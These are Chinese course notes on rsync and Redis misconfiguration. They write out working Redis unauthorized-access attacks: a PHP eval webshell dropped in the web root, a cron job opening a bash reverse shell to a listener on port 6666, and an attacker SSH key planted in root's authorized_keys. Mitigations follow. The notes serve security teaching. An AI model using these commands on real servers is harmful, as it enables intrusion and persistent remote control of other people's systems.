安全基礎rsync/redis配置不當打卡第八天

本文爲蘇尚武老師運維安全課程課程筆記


  • Rsync
    rsync -avzP -e ’ssh -p 22 /tmp/ test@ip:/web/‘通過ssh傳輸
    rsync+crontab
    rsync+sersync
    默認端口873
    配置低級錯誤:使用root,關閉只讀,取消認證
    通過掃描873端口,進行rsync上傳導網站根目錄
  • python編寫rsync掃描腳本
    掃描開放873端口
    獲取rsync目錄
    密碼嘗試
  • redis配置不當
    redis未授權訪問漏洞,造成linux挖礦
  • 三種攻擊手法
  • webshell:
    進入控制檯
    獲取網站路徑
    config set dir /var/www/html
    config set dbfilename shell.php
    set x “<?php @eval($_POST[a]);?>”
    save
    然後可以通過php連接訪問網站中的程序
  • 寫入crontab任務:
    set x “\n* * * * * bash -i >& /dev/tcp/192.167.4.107/6666 0>&1\n”
    config set dir /var/spool/cron/
    config set dbfilename root
    Save
    Attack:nc -lvnp 6666
  • 寫入ssh公鑰
    (echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > foo.txt
    cat foo.txt |redis-cli -h 192.168.4.106 -x set crackit
    連接上去redis-cli -h 192.168.4.106設置
    config set dir /root/.ssh/
    config set dbfilename “authorized_keys”
    save
    可以直接通過ssh -i id_rsa.pub [email protected]
  • 修復redis
    設置密碼
    不要把redis暴露公網
    普通權限啓動
    降低普通用戶.ssh權限
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章